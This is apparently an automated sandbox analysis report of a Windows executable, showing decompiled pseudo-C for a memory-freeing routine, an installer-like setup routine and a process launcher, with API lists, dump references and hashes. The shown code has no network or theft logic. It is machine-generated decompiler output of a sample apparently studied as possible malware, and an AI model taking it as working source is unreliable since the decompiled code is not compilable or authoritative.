				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                                                                                            0x0040426c
                                                                                                                            0x0040426c
                                                                                                                            0x00404275
                                                                                                                            0x0040427b
                                                                                                                            0x00404364
                                                                                                                            0x00404367
                                                                                                                            0x00404454
                                                                                                                            0x00404455
                                                                                                                            0x00404458
                                                                                                                            0x00403cf8
                                                                                                                            0x00403cfa
                                                                                                                            0x00403cfc
                                                                                                                            0x00403d01
                                                                                                                            0x00403d04
                                                                                                                            0x00403d09
                                                                                                                            0x00403d0d
                                                                                                                            0x00403d13
                                                                                                                            0x00403d17
                                                                                                                            0x00403d1d
                                                                                                                            0x00403d39
                                                                                                                            0x00403d3d
                                                                                                                            0x00403d40
                                                                                                                            0x00403d40
                                                                                                                            0x00403d42
                                                                                                                            0x00403d4a
                                                                                                                            0x00403d57
                                                                                                                            0x00403d5c
                                                                                                                            0x00403d5e
                                                                                                                            0x00403d60
                                                                                                                            0x00403d63
                                                                                                                            0x00403d63
                                                                                                                            0x00403d65
                                                                                                                            0x00403d69
                                                                                                                            0x00403d6b
                                                                                                                            0x00403d6d
                                                                                                                            0x00403d6f
                                                                                                                            0x00000000
                                                                                                                            0x00403d6f
                                                                                                                            0x00000000
                                                                                                                            0x00403d6b
                                                                                                                            0x00403d1f
                                                                                                                            0x00403d27
                                                                                                                            0x00403d2e
                                                                                                                            0x00403d34
                                                                                                                            0x00403d30
                                                                                                                            0x00403d30
                                                                                                                            0x00403d30
                                                                                                                            0x00403d2e
                                                                                                                            0x00403d73
                                                                                                                            0x00403d75
                                                                                                                            0x00403d7e
                                                                                                                            0x00403d87
                                                                                                                            0x00403d87
                                                                                                                            0x00403d8a
                                                                                                                            0x00403d9a
                                                                                                                            0x0040445e
                                                                                                                            0x00404463
                                                                                                                            0x00404463
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404281
                                                                                                                            0x00404281
                                                                                                                            0x00404283
                                                                                                                            0x00404285
                                                                                                                            0x004042e8
                                                                                                                            0x004042e8
                                                                                                                            0x004042ed
                                                                                                                            0x004042f1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004042f3
                                                                                                                            0x004042f5
                                                                                                                            0x004042fc
                                                                                                                            0x00000000
                                                                                                                            0x004042fe
                                                                                                                            0x00404302
                                                                                                                            0x00404307
                                                                                                                            0x00404308
                                                                                                                            0x00404309
                                                                                                                            0x0040430e
                                                                                                                            0x00404312
                                                                                                                            0x0040431c
                                                                                                                            0x00404321
                                                                                                                            0x00404322
                                                                                                                            0x00000000
                                                                                                                            0x00404322
                                                                                                                            0x00404312
                                                                                                                            0x00000000
                                                                                                                            0x004042fc
                                                                                                                            0x004042e8
                                                                                                                            0x00404287
                                                                                                                            0x00404287
                                                                                                                            0x00404287
                                                                                                                            0x00404287
                                                                                                                            0x0040428b
                                                                                                                            0x0040428e
                                                                                                                            0x004042bc
                                                                                                                            0x004042be
                                                                                                                            0x004042d3
                                                                                                                            0x004042d3
                                                                                                                            0x004042c0
                                                                                                                            0x004042c0
                                                                                                                            0x004042c3
                                                                                                                            0x004042c6
                                                                                                                            0x004042c9
                                                                                                                            0x004042cc
                                                                                                                            0x004042ce
                                                                                                                            0x004042d1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004042d1
                                                                                                                            0x004042d6
                                                                                                                            0x004042d8
                                                                                                                            0x004042da
                                                                                                                            0x004042dd
                                                                                                                            0x0040436d
                                                                                                                            0x00404370
                                                                                                                            0x00404372
                                                                                                                            0x00404374
                                                                                                                            0x00404375
                                                                                                                            0x00404377
                                                                                                                            0x00404328
                                                                                                                            0x00404328
                                                                                                                            0x0040432d
                                                                                                                            0x00404335
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404337
                                                                                                                            0x00404339
                                                                                                                            0x00404340
                                                                                                                            0x00000000
                                                                                                                            0x00404342
                                                                                                                            0x00404344
                                                                                                                            0x00404349
                                                                                                                            0x0040434e
                                                                                                                            0x00404356
                                                                                                                            0x0040435a
                                                                                                                            0x00000000
                                                                                                                            0x0040435a
                                                                                                                            0x00404356
                                                                                                                            0x00000000
                                                                                                                            0x00404340
                                                                                                                            0x00404328
                                                                                                                            0x00404379
                                                                                                                            0x00404379
                                                                                                                            0x00404381
                                                                                                                            0x00404385
                                                                                                                            0x004043bc
                                                                                                                            0x004043bf
                                                                                                                            0x004043c2
                                                                                                                            0x004043c4
                                                                                                                            0x004043ca
                                                                                                                            0x004043cc
                                                                                                                            0x004043cc
                                                                                                                            0x00404387
                                                                                                                            0x00404387
                                                                                                                            0x00404387
                                                                                                                            0x0040438a
                                                                                                                            0x0040438a
                                                                                                                            0x0040438e
                                                                                                                            0x00404392
                                                                                                                            0x004043d4
                                                                                                                            0x004043d7
                                                                                                                            0x004043d9
                                                                                                                            0x004043db
                                                                                                                            0x004043e1
                                                                                                                            0x004043e5
                                                                                                                            0x004043e5
                                                                                                                            0x004043e1
                                                                                                                            0x00404394
                                                                                                                            0x0040439a
                                                                                                                            0x004043ec
                                                                                                                            0x004043f6
                                                                                                                            0x00404424
                                                                                                                            0x0040442a
                                                                                                                            0x0040442f
                                                                                                                            0x00404436
                                                                                                                            0x00404440
                                                                                                                            0x00404446
                                                                                                                            0x0040444d
                                                                                                                            0x00404451
                                                                                                                            0x004043f8
                                                                                                                            0x004043f8
                                                                                                                            0x004043fb
                                                                                                                            0x004043fd
                                                                                                                            0x00404400
                                                                                                                            0x00404403
                                                                                                                            0x00404405
                                                                                                                            0x00404414
                                                                                                                            0x00404419
                                                                                                                            0x0040441c
                                                                                                                            0x00404420
                                                                                                                            0x00404420
                                                                                                                            0x0040439c
                                                                                                                            0x0040439f
                                                                                                                            0x004043a2
                                                                                                                            0x004043aa
                                                                                                                            0x004043af
                                                                                                                            0x004043b6
                                                                                                                            0x004043ba
                                                                                                                            0x004043ba
                                                                                                                            0x00404290
                                                                                                                            0x00404290
                                                                                                                            0x00404292
                                                                                                                            0x00404298
                                                                                                                            0x0040429b
                                                                                                                            0x004042a4
                                                                                                                            0x004042a7
                                                                                                                            0x004042aa
                                                                                                                            0x004042ad
                                                                                                                            0x004042b0
                                                                                                                            0x004042b3
                                                                                                                            0x004042b6
                                                                                                                            0x004042b6
                                                                                                                            0x004042b8
                                                                                                                            0x004042b9
                                                                                                                            0x0040429d
                                                                                                                            0x0040429d
                                                                                                                            0x0040429d
                                                                                                                            0x0040429f
                                                                                                                            0x004042a1
                                                                                                                            0x004042a2
                                                                                                                            0x004042a2
                                                                                                                            0x0040429b
                                                                                                                            0x0040428e

                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                                                            • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                                                                            • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                                                            • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B60E8 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 165windowCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E004B60E8(void* __ebx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				WCHAR* _t63;
				intOrPtr _t69;
				intOrPtr _t74;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t78;
				struct HWND__* _t81;
				intOrPtr _t82;
				intOrPtr _t86;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t120;
				intOrPtr _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t85 = __ebx;
				_pop(_t101);
				_pop(_t88);
				 *[fs:eax] = _t101;
				E004AF678(_t88);
				if( *0x4ba440 == 0) {
					if(( *0x4c1d71 & 0x00000001) == 0 &&  *0x4ba441 == 0) {
						_t61 =  *0x4ba674; // 0x4c0d0c
						_t4 = _t61 + 0x2f8; // 0x0
						_t63 = E004084EC( *_t4);
						_t88 = _t120 - 0x28;
						_t101 =  *0x4c1c48; // 0x0
						E00426F08(0xc2, _t120 - 0x28, _t101);
						if(MessageBoxW(0, E004084EC( *((intOrPtr*)(_t120 - 0x28))), _t63, 0x24) != 6) {
							 *0x4ba44c = 2;
							E0041F238();
						}
					}
					E004056D0();
					E004AEFE8(_t120 - 0x2c, _t85, _t101, _t118, _t119); // executed
					E00407E00(0x4c1d94,  *((intOrPtr*)(_t120 - 0x2c)));
					_t26 =  *0x4c1d84; // 0x0
					E00422954(_t26, _t88, _t120 - 0x34);
					E004226C8( *((intOrPtr*)(_t120 - 0x34)), _t85, _t120 - 0x30, L".tmp", _t118, _t119);
					_push( *((intOrPtr*)(_t120 - 0x30)));
					_t31 =  *0x4c1d94; // 0x0
					E00422660(_t31, _t120 - 0x38);
					_pop(_t90);
					E0040873C(0x4c1d98, _t90,  *((intOrPtr*)(_t120 - 0x38)));
					_t107 =  *0x4c1d98; // 0x0
					E00407E00(0x4c1d9c, _t107);
					_t37 =  *0x4c1d90; // 0x4d703c
					_t15 = _t37 + 0x14; // 0xfe170
					_t38 =  *0x4c1d88; // 0x0
					E00423CE8(_t38,  *_t15);
					_push(_t120);
					_push(0x4b63ab);
					_push( *[fs:edx]);
					 *[fs:edx] = _t121;
					 *0x4c1de0 = 0;
					_t42 = E00423D00(1, 0, 1, 0); // executed
					 *0x4c1d8c = _t42;
					_push(_t120);
					_push(0x4b639a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t44 =  *0x4c1d90; // 0x4d703c
					_t16 = _t44 + 0x18; // 0x30be00
					 *0x4c1de0 = E004053F0( *_t16);
					_t47 =  *0x4c1d90; // 0x4d703c
					_t17 = _t47 + 0x18; // 0x30be00
					_t86 =  *0x4c1de0; // 0x7fba0010
					E00405884(_t86,  *_t17);
					_push(_t120);
					_push(0x4b62e9);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t51 =  *0x424cd8; // 0x424d30
					_t93 =  *0x4c1d88; // 0x0
					_t53 = E00424748(_t93, 1, _t51); // executed
					 *0x4c1de4 = _t53;
					_push(_t120);
					_push(0x4b62d8);
					_push( *[fs:eax]);
					 *[fs:eax] = _t121;
					_t55 =  *0x4c1d90; // 0x4d703c
					_t18 = _t55 + 0x18; // 0x30be00
					_t56 =  *0x4c1de4; // 0x2583590
					E00424A24(_t56,  *_t18, _t86);
					_pop(_t114);
					 *[fs:eax] = _t114;
					_push(E004B62DF);
					_t59 =  *0x4c1de4; // 0x2583590
					return E00405CE8(_t59);
				} else {
					_t69 =  *0x4ba674; // 0x4c0d0c
					_t1 = _t69 + 0x1d0; // 0x0
					E004AFA44( *_t1, __ebx, __edi, __esi);
					 *0x4ba44c = 0;
					_pop(_t115);
					 *[fs:eax] = _t115;
					_push(E004B6554);
					_t74 =  *0x4c1d88; // 0x0
					_t75 = E00405CE8(_t74);
					if( *0x4c1d9c != 0) {
						_t117 =  *0x4c1d9c; // 0x0
						_t75 = E004AF1B4(0, _t117, 0xfa, 0x32); // executed
					}
					if( *0x4c1d94 != 0) {
						_t82 =  *0x4c1d94; // 0x0
						_t75 = RemoveDirectoryW(E004084EC(_t82)); // executed
					}
					if( *0x4ba450 != 0) {
						_t81 =  *0x4ba450; // 0xb0054
						_t75 = DestroyWindow(_t81); // executed
					}
					if( *0x4c1d78 != 0) {
						_t76 =  *0x4c1d78; // 0x0
						_t99 =  *0x4c1d7c; // 0x19
						_t116 =  *0x426bb0; // 0x426bb4
						E00408D08(_t76, _t99, _t116);
						_t78 =  *0x4c1d78; // 0x0
						E0040540C(_t78);
						 *0x4c1d78 = 0;
						return 0;
					}
					return _t75;
				}
			}




































                                                                                                                            0x004b60e8
                                                                                                                            0x004b60e8
                                                                                                                            0x004b60e8
                                                                                                                            0x004b60ea
                                                                                                                            0x004b60ec
                                                                                                                            0x004b60ed
                                                                                                                            0x004b610d
                                                                                                                            0x004b6119
                                                                                                                            0x004b613e
                                                                                                                            0x004b614b
                                                                                                                            0x004b6150
                                                                                                                            0x004b6156
                                                                                                                            0x004b615c
                                                                                                                            0x004b615f
                                                                                                                            0x004b6169
                                                                                                                            0x004b6181
                                                                                                                            0x004b6183
                                                                                                                            0x004b618d
                                                                                                                            0x004b618d
                                                                                                                            0x004b6181
                                                                                                                            0x004b6192
                                                                                                                            0x004b619a
                                                                                                                            0x004b61a7
                                                                                                                            0x004b61af
                                                                                                                            0x004b61b4
                                                                                                                            0x004b61c4
                                                                                                                            0x004b61cc
                                                                                                                            0x004b61d0
                                                                                                                            0x004b61d5
                                                                                                                            0x004b61e2
                                                                                                                            0x004b61e3
                                                                                                                            0x004b61ed
                                                                                                                            0x004b61f3
                                                                                                                            0x004b61f8
                                                                                                                            0x004b61fd
                                                                                                                            0x004b6200
                                                                                                                            0x004b6205
                                                                                                                            0x004b620c
                                                                                                                            0x004b620d
                                                                                                                            0x004b6212
                                                                                                                            0x004b6215
                                                                                                                            0x004b621a
                                                                                                                            0x004b6232
                                                                                                                            0x004b6237
                                                                                                                            0x004b623e
                                                                                                                            0x004b623f
                                                                                                                            0x004b6244
                                                                                                                            0x004b6247
                                                                                                                            0x004b624a
                                                                                                                            0x004b624f
                                                                                                                            0x004b6257
                                                                                                                            0x004b625c
                                                                                                                            0x004b6261
                                                                                                                            0x004b6264
                                                                                                                            0x004b626e
                                                                                                                            0x004b6275
                                                                                                                            0x004b6276
                                                                                                                            0x004b627b
                                                                                                                            0x004b627e
                                                                                                                            0x004b6281
                                                                                                                            0x004b6287
                                                                                                                            0x004b6294
                                                                                                                            0x004b6299
                                                                                                                            0x004b62a0
                                                                                                                            0x004b62a1
                                                                                                                            0x004b62a6
                                                                                                                            0x004b62a9
                                                                                                                            0x004b62ac
                                                                                                                            0x004b62b1
                                                                                                                            0x004b62b6
                                                                                                                            0x004b62bb
                                                                                                                            0x004b62c2
                                                                                                                            0x004b62c5
                                                                                                                            0x004b62c8
                                                                                                                            0x004b62cd
                                                                                                                            0x004b62d7
                                                                                                                            0x004b611b
                                                                                                                            0x004b611b
                                                                                                                            0x004b6120
                                                                                                                            0x004b6126
                                                                                                                            0x004b612d
                                                                                                                            0x004b64b5
                                                                                                                            0x004b64b8
                                                                                                                            0x004b64bb
                                                                                                                            0x004b64c0
                                                                                                                            0x004b64c5
                                                                                                                            0x004b64d1
                                                                                                                            0x004b64df
                                                                                                                            0x004b64e7
                                                                                                                            0x004b64e7
                                                                                                                            0x004b64f3
                                                                                                                            0x004b64f5
                                                                                                                            0x004b6500
                                                                                                                            0x004b6500
                                                                                                                            0x004b650c
                                                                                                                            0x004b650e
                                                                                                                            0x004b6514
                                                                                                                            0x004b6514
                                                                                                                            0x004b6520
                                                                                                                            0x004b6522
                                                                                                                            0x004b6527
                                                                                                                            0x004b652d
                                                                                                                            0x004b6533
                                                                                                                            0x004b6538
                                                                                                                            0x004b653d
                                                                                                                            0x004b6544
                                                                                                                            0x00000000
                                                                                                                            0x004b6544
                                                                                                                            0x004b6549
                                                                                                                            0x004b6549

                                                                                                                            APIs
                                                                                                                            • MessageBoxW.USER32(00000000,00000000,00000000,00000024), ref: 004B6179
                                                                                                                              • Part of subcall function 004AFA44: MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                                                                                            • DestroyWindow.USER32(000B0054,004B6554), ref: 004B6514
                                                                                                                              • Part of subcall function 004AF1B4: Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                                                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                                                                                              • Part of subcall function 004AF1B4: GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastMessage$DestroyDirectoryRemoveSleepWindow
                                                                                                                            • String ID: .tmp$0MB$<pM
                                                                                                                            • API String ID: 3858953238-1900878030
                                                                                                                            • Opcode ID: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                                                            • Instruction ID: b159488041d1577a8b45ed1a1d18f26c00613076fc9a683522f38ff229f2206a
                                                                                                                            • Opcode Fuzzy Hash: 930ec171da33bb7cb26a68baf49ed61eca7e6ecce176de484762bd5e64518e8e
                                                                                                                            • Instruction Fuzzy Hash: AC615A342002009FD755EF69ED86EAA37A5EB4A308F51453AF801976B2DA3CBC51CB6D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF728 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 61%
                                                                                                                            			E004AF728(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				void* _v88;
				void* _v92;
				int _t23;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x4af7ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x4af81c);
				_push(__eax);
				_push(0x4af82c);
				_push(__edx);
				E004087C4( &_v8, __eax, 4, __ecx, __edx);
				E00405884( &_v76, 0x44);
				_v76.cb = 0x44;
				_t23 = CreateProcessW(0, E004084EC(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t58 = _t23;
				if(_t23 == 0) {
					E004AF34C(0x83, _t41, 0, _t53, _t58);
				}
				CloseHandle(_v88);
				do {
					E004AF6FC();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0x4ff) == 1);
				E004AF6FC();
				GetExitCodeProcess(_v92, _t51); // executed
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(0x4af806);
				return E00407A20( &_v8);
			}











                                                                                                                            0x004af733
                                                                                                                            0x004af736
                                                                                                                            0x004af738
                                                                                                                            0x004af73a
                                                                                                                            0x004af73e
                                                                                                                            0x004af73f
                                                                                                                            0x004af744
                                                                                                                            0x004af747
                                                                                                                            0x004af74a
                                                                                                                            0x004af74f
                                                                                                                            0x004af750
                                                                                                                            0x004af755
                                                                                                                            0x004af75e
                                                                                                                            0x004af76d
                                                                                                                            0x004af772
                                                                                                                            0x004af798
                                                                                                                            0x004af79d
                                                                                                                            0x004af79f
                                                                                                                            0x004af7a5
                                                                                                                            0x004af7a5
                                                                                                                            0x004af7ae
                                                                                                                            0x004af7b3
                                                                                                                            0x004af7b3
                                                                                                                            0x004af7cc
                                                                                                                            0x004af7d1
                                                                                                                            0x004af7db
                                                                                                                            0x004af7e4
                                                                                                                            0x004af7eb
                                                                                                                            0x004af7ee
                                                                                                                            0x004af7f1
                                                                                                                            0x004af7fe

                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNEL32 ref: 004AF798
                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                                                                                            • MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                                                                                            • CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                                                                                              • Part of subcall function 004AF34C: GetLastError.KERNEL32(00000000,004AF3F5,?,?,00000000), ref: 004AF36F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                            • String ID: D
                                                                                                                            • API String ID: 3356880605-2746444292
